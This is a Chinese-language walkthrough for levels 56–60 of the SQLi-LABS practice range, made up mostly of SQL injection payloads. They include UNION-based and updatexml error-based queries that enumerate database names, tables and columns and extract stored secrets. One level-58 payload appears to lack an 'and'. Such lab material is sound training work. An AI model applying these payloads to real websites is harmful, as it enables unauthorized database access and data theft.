本文主要是介绍SQLi-LABS靶场56-60通过攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
第56关(单引号括号闭合)
查数据库
?id=-1') union select 1,database(),3 --+
查表
?id=-1') union select 1,(select table_name from information_schema.tables where table_schema=database()),3 --+
查字段
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='rnaxf8nzlp'),3 --+
查数据
?id=-1') union select 1,(select group_concat(id,sessid,secret_KZJB,tryy)from rnaxf8nzlp),3 --+
第57关(双引号闭合)
查库
?id=-1" union select 1,database(),3 --+
查表
?id=-1" union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3 --+
查字段
?id=-1" union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='gfmyzgrq8v'),3 --+
查数据
?id=-1" union select 1,(select group_concat(id,sessid,secret_MOXR,tryy)from gfmyzgrq8v),3 --+
第58关(单引号闭合,报错注入)
查表
?id=1' and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3),3) --+
查字段
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() table_name='eavj19b9wf3'),0x7e),1) --+
第59关(报错注入)
这关和上一关一样,闭合方式为数字型闭合
第60关(双引号括号闭合报错注入)
查表
?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+
查字段
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='aojta7hn3'),0x7e),1)--+
这篇关于SQLi-LABS靶场56-60通过攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
